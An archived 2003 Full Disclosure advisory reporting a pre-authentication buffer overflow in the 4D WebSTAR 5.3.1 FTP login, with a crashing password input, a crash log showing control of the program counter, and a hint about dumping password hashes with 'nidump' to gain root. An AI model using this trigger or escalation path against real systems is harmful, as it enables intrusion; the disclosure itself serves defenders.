Full Disclosure mailing list archives
4D WebSTAR FTP Buffer Overflow.
From: B-r00t <br00t () blueyonder co uk>
Date: Thu, 11 Sep 2003 21:01:09 +0100 (BST)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Remote Vulnerability in 4D WebSTAR Server Suite. ================================================ Date: 11.09.2003 Author: B-r00t. 2003. Email: B-r00t <br00t () blueyonder co uk> Vendor: 4D. Reference: http://www.4d.com/products/webstar.html Versions: 4D WebSTAR 5.3.1 (Latest) => VULNERABLE. Tested: 4D WebSTAR 5.3.1 (Trial Version). Exploit: [attached] 4DWS_ftp.c - Gives a shell on port 6969. Description: There is a pre authentication buffer overflow that exists in the login mechanism of the WebSTAR FTP service. As shown below: - $ ftp maki Connected to maki (192.168.0.69). 220 FTP server ready. Name (maki:br00t): test 331 User name OK, need password. Password: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXabcd 530 FTP login failed. Login failed. 421 Service not available, remote server has closed connection The following information is reported in the crash logfile '/Users/webstar/Library/Logs/CrashReporter/ WSWebServer.crash.log' ********** Date/Time: 2003-09-08 09:25:24 +0100 OS Version: 10.2.6 (Build 6L60) Host: maki Command: WSWebServer PID: 359 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_INVALID_ADDRESS (0x0001) at 0x61626364 PPC Thread State: srr0: 0x61626364 srr1: 0x4000f030 vrsave: 0x00000000 xer: 0x00000000 lr: 0x61626364 ctr: 0x90000e40 mq: 0x00000000 r0: 0x61626364 r1: 0xf02874f0 r2: 0xa0007728 r3: 0xf0288cd0 r4: 0xf02872e0 r5: 0x0000005e r6: 0x80808080 r7: 0x00000001 r8: 0x30000000 r9: 0x00954e64 r10: 0xf02870aa r11: 0x00959e94 r12: 0x00000000 r13: 0x00000000 r14: 0x00000000 r15: 0x00000000 r16: 0x00000000 r17: 0x00000000 r18: 0x00000000 r19: 0x00000000 r20: 0x00000000 r21: 0x00000000 r22: 0x00000000 r23: 0x0000000b r24: 0x00958fec r25: 0x00958fec r26: 0x58585858 r27: 0x58585858 r28: 0x58585858 r29: 0x58585858 r30: 0x58585858 r31: 0x58585858 As can be seen from the crash dump, the application has attempted to execute code at '0x61626364' which is ASCII code for 'abcd'. Being able to influence the applications execution process means it is possible for an attacker to execute arbitrary code and thus gain access to the target machine. Fortunately, the service is running as the 'webstar' user which is not an administrative account by default. However, once an attacker has gained initial access to the target machine, it is possible to access the system password hashes using the 'nidump' utility and hence possibly gain admin (root) priveleges if these hashes are cracked. FIX: Disable the FTP service until a fix is available. Status: Vendor informed 08.09.2003. - -- B#. - ---------------------------------------------------- Email : B-r00t <br00t () blueyonder co uk> Key fingerprint = 74F0 6A06 3E57 083A 4C9B ED33 AD56 9E97 7101 5462 "You Would Be Paranoid If They Were Watching You !!!" - ----------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (OpenBSD) iD8DBQE/YNSOrVael3EBVGIRAnkOAKDC81IlxG6v05ctDdGqJWU7+kekagCfaSpH elBa7Jmca+z8ralZp6tDgwQ= =4WHc -----END PGP SIGNATURE-----
Attachment:
4DWS_ftp.c
Description:
Current thread:
- 4D WebSTAR FTP Buffer Overflow. B-r00t (Sep 11)